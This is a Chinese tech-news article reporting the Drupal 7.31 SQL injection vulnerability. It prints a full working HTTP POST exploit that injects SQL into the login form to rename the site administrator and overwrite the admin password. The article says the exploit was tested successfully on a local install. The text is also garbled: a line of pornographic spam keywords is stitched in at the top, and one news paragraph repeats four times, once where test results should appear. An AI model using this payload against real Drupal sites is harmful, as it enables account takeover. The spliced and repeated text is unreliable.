偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

Drupal 7.31版本爆嚴(yán)重SQL注入漏洞

作者:pnig0s
安全 漏洞
今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測(cè)試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測(cè)試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。

今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測(cè)試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測(cè)試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。

[[121262]]

測(cè)試代碼:(請(qǐng)勿用于非法用途)

POST /drupal-7.31/?q=node&destination=node HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/drupal-7.31/
Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

本地環(huán)境測(cè)試效果:

今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測(cè)試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測(cè)試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。 

今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并給出了利用測(cè)試的EXP代碼,小編在本地搭建Drupal7.31的環(huán)境,經(jīng)過測(cè)試,發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個(gè)攻擊者自定義的用戶。

請(qǐng)相關(guān)廠商關(guān)注,并盡快修復(fù)漏洞。

新版下載:

https://www.drupal.org/drupal-7.32

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
DrupalSQL注入SQL注入漏洞
相關(guān)推薦

2021-03-31 11:29:12

OpenSSLDoS證書驗(yàn)證漏洞

2011-08-30 16:11:03

2010-07-13 21:23:32

軟件安全安全漏洞

2014-11-04 10:23:14

2009-05-31 21:16:07

2009-09-27 13:11:24

2010-10-21 16:10:08

2009-05-30 10:04:56

2014-05-15 10:00:31

Dropbox安全漏洞

2022-07-05 15:12:58

谷歌Chrome零日漏洞

2009-09-30 11:10:31

2010-11-09 16:03:27

2014-02-28 17:29:06

2009-02-12 10:14:16

2010-10-22 15:18:18

SQL注入漏洞

2009-11-02 13:47:09

2009-10-25 13:32:09

2021-09-16 09:05:45

SQL注入漏洞網(wǎng)絡(luò)攻擊

2011-07-21 09:25:41

2020-10-15 12:24:46

Linux漏洞攻擊
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)